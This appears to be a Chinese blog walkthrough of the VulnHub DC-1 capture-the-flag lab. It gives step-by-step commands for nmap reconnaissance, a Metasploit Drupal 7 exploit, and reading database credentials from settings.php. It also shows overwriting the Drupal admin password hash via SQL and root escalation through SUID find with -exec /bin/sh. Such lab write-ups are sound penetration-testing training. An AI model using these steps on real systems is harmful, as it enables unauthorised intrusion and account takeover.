首页 > 其他分享 >DC-1通关详解

DC-1通关详解

时间:2024-09-20 18:48:55浏览次数:3  
标签:文件 查看 发现 XXX DC 详解 权限 root 通关

一、环境搭建:

1、靶机描述

DC-1是一个专门建立的脆弱实验室,目的是获得渗透测试领域的经验。它是为初学者设计的挑战,但它到底有多容易取决于你的技能和知识,以及你的学习能力。要成功完成这一挑战,您需要掌握Linux技能,熟悉Linux命令行,并具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。有多种方法可以获得根,但是,我为初学者提供了一些包含线索的标志。总共有五个flag,但最终目标是在根的主目录中找到并读取标志。您甚至不需要成为根用户来执行此操作,但是,您将需要根权限。根据您的技能水平,您可以跳过寻找大多数这些标志,然后继续直。初学者可能会遇到他们以前从未遇到过的挑战,但是谷歌搜索应该是获得完成这个挑战所需的信息所必需的。

根据描述信息我们可以知道本靶场环境总共有5个flag。

2、下载靶场环境

靶场下载地址:

DC: 1 ~ VulnHub

二、渗透靶场

本环境重在在于如下两个知识点

Drupal 7  漏洞利用

find  提权

三、首先要把两个虚拟机启动 kali为攻击机 DC-1为靶场机(如果两个虚拟机有一个没有启动实验将无法进行)

1、目标:

目标就是我们搭建的靶场,靶场IP为:XXX.XXX.XXX.XXX/24

  1. Linux利用ifconfig来查询本虚拟机的IP地址

2、信息收集:寻找靶机真实IP

nmap -sP  XXX.XXX.XXX.XXX /24

扫描网段中有哪些主机在线,使用 -sP 参数,不扫描端口,只扫描「存活主机」。

本质上是Ping扫描,能Ping通有回包,就判定主机在线。

3、信息收集:探端口及服务

nmap -A -p- -v 192.168.66.140

-A 综合性扫描

-v 冗余模式。强烈推荐使用这个选项,它会给出扫描过程中的详细信息

发现开放了22算口,开放了ssh服务,OpenSSH 6.0p1
发现开放了80端口,存在web服务,Apache httpd 2.2.22,Drupal 7
发现开放了111端口,开放了rpcbind服务

访问web站点

发现是一个电信的drupal服务,根据nmap结果可知当前运行的是Drupal 7的CMS

searchsploit  drupal 7

利用MSF渗透

典型的drupal,启动Metersploit  MSF存在drupal模块,尝试使用msf渗透

5、MSF简单命令介绍

Msfconsole 进入MSF控制台

search 搜索相应模块

use            对应模块

show options   查看信息

set rhosts   远程主机ip

run            攻击

6、进入MSF控制台搜索drupal模块

进入MSF控制台msfdb run

搜索drupal模块search drupal

7、选择模块进行测试

用2018的测试

  1. 设置靶机IP运行msf控制台

  1. 我们先shell一下 然后在执行whoami

发现是www-data权限

进入home目录,发现flag4.txt文件,提示需要提升权限

10、使用python反弹一个交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

显示了当前路径

11、发现flag1文件

查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件

12、发现flag2

Drupal的默认配置文件为

/var/www/sites/default/settings.php

查看文件内容

cat /var/www/sites/default/settings.php

发现了flag2和数据库的账号密码

flag2提示,提升权限为root来查看敏感文件

13、mysql -u dbuser -p

查看数据库,切换到drupaldb数据库

show databases; 查看mysql数据库中有哪些数据库

use drupaldb 查看所有用户的信息

show tables; 查看数据库中的所有表名

select * from users; 发现admin信息

  1. 进入www目录 quit;(exit;)

站点路径下执行

php scripts/password-hash.sh 新密码

然后在进入数据库中把密码字段进行替换
进入mysql,输入密码,切换到drupaldb数据库

mysql -u dbuser -pR0ck3t

use drupaldb

将pass字段进行替换

update users set pass="$S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw" where name="admin";

15、发现flag3

登陆战点之后,随便翻一番,发现flag3,

http://192.168.66.140/node#overlay=admin/content

点击flag3进入,发现提示信息

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

大致意思是提权并提示 -exec,想到suid提权 find 命令

​ SUID (Set UID)是Linux中的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID权限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义.

​ 在执行过程中,调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果ls设置了SUID权限,我们可在非root用户下运行该二进制可执行文件,在执行文件时,该进程的权限将为root权限.

​ 利用此特性,我们可通过SUID进行提权

使用命令查看 suid 权限的可执行二进制程序

find / -perm -4000 2>/dev/null

发现find命令

16、 使用命令测试,发现为root权限

touch 123

ls

find / -name 123 -exec "whoami" \;

17、发现最后的flag文件

我们切换语句进入shell,执行whoami查看当前权限,执行ls查看当前目录下文件,切换到root目录,查看文件,发现cat thefinalflag.txt文件。

find ./ -name 666 -exec "/bin/sh" \;

whoami

ls

cd /root

ls

查看cat thefinalflag.txt文件

cat thefinalflag.txt

18、.发现flag4

此时我们查看 /etc/passwd 文件,发现存在 flag4 用户,我们也可以使用 hydra 进行爆破

cat /etc/passwd

目标完成实验结束

标签:文件,查看,发现,XXX,DC,详解,权限,root,通关
From: https://blog.csdn.net/2401_84810507/article/details/142392061

相关文章

  • 1--SpringBoot外卖项目介绍及环境搭建 详解
    目录软件开发整体流程软件开发流程角色分工软件环境苍穹外卖项目介绍项目介绍产品原型技术选型开发环境搭建前端环境搭建后端环境搭建完善登录功能导入接口文档Swagger介绍使用方式常用注解软件开发整体流程软件开发流程需求分析:需求规则说明书、产品原......
  • SQL Server 数据类型转换详解
    在SQLServer中,数据类型转换是数据库开发中非常常见的任务。数据类型转换是指将一种数据类型的数据转换为另一种数据类型。SQLServer支持两种类型的转换方式:隐式转换和显式转换。本文将详细介绍SQLServer中数据类型转换的原理、使用方法、常见场景,并通过具体的例子进行解释和演示......
  • 死锁(详解版)
    一、什么是死锁死锁就是多个线程在运行过程中,都需要获取对方线程所持有的锁(资源),导致处于长期无限等待的状态。二、死锁产生原因两个线程各自持有不同的锁,然后试图获取对方线程的锁,造成双方无限等待,从而产生死锁。三、死锁产生必要条件1.资源互斥:对所分配的资源进行......
  • dc-5
    靶机下载:dc-5首先先找到靶机nmap-sV192.168.6.0/24去看一下端口服务联系这个地方存在输入我们可以进行尝试,没有什么效果但是发现这个地方的数字一直会改变再看url怀疑存在文件包含漏洞我们扫一下目录发现footer.php即为刚才页面变化的数值这样我们及确定存在文件......
  • YARA规则详解及其在恶意软件分析中的应用
    YARA规则是用于识别恶意软件、恶意文件或可疑活动的一种工具和规则集。YARA主要用于恶意软件分析领域,帮助研究人员根据模式匹配来识别类似的恶意软件样本。下面我们一步步介绍YARA规则的结构和使用:1.规则的基本结构YARA规则由三部分组成:meta、strings和condition。ruleExampleR......
  • UWB无线载波通信技术详解!【UWB人员定位系统源码】
    简介超宽带(UltraWideBand,UWB)技术是一种无线载波通信技术,它不采用正弦载波,而是利用纳秒级的非正弦波窄脉冲传输数据,因此其所占的频谱范围很宽。尽管使用无线通信,但其数据传输速率可以达到几百兆比特每秒以上。使用UWB技术可在非常宽的带宽上传输信号,美国联邦通信委员会(FCC)对UWB技......
  • Qt拖拽事件详解,拖放数据传递
    1.QT拖拽事件分为两类。(1)电脑上的文件拖入程序,在程序上放下文件Drop;例如将视频拖入程序进行播放,将图片突入程序进行展示;(2)程序中界面内部拖放,例如将组织树中的监控点拖入播放窗口进行播放;将一个表格中的人员拖入另外一个表格等;将QTreeview中的item拖动位置,移到不同的组织下;或者将......
  • 函数及其所有相关知识点详解及实例
    一、JavaScript函数基础在JavaScript中,函数是一等公民,这意味着函数可以像其他数据类型一样被传递和操作。函数可以封装代码块,提高代码的复用性和解耦性。1.函数声明定义函数: function自定义函数名(){}调用函数: 函数名()functionadd(a,b){returna+b......
  • 实时美颜的技术突破:视频美颜SDK与直播美颜工具的开发详解
    如今,视频美颜SDK和直播美颜工具的开发,为各类应用提供了技术支持,使得美颜效果更加智能、高效。本文将详细探讨实时美颜的技术突破及其在视频美颜SDK和直播美颜工具中的应用与开发。 一、视频美颜SDK的核心技术1.人脸检测与特征点识别视频美颜SDK的第一步是对用户的面部进行精准检测......
  • 如何基于Flink CDC与OceanBase构建实时数仓,实现简化链路,高效排查
    本文作者:阿里云FlinkSQL负责人,伍翀,ApacheFlinkPMCMember&Committer众多数据领域的专业人士都很熟悉ApacheFlink,它作为流式计算引擎,流批一体,其核心在于其强大的分布式流数据处理能力,同时巧妙地融合了流计算与批计算的能力,因此成为了众多企业在进行流式计算业务时的首......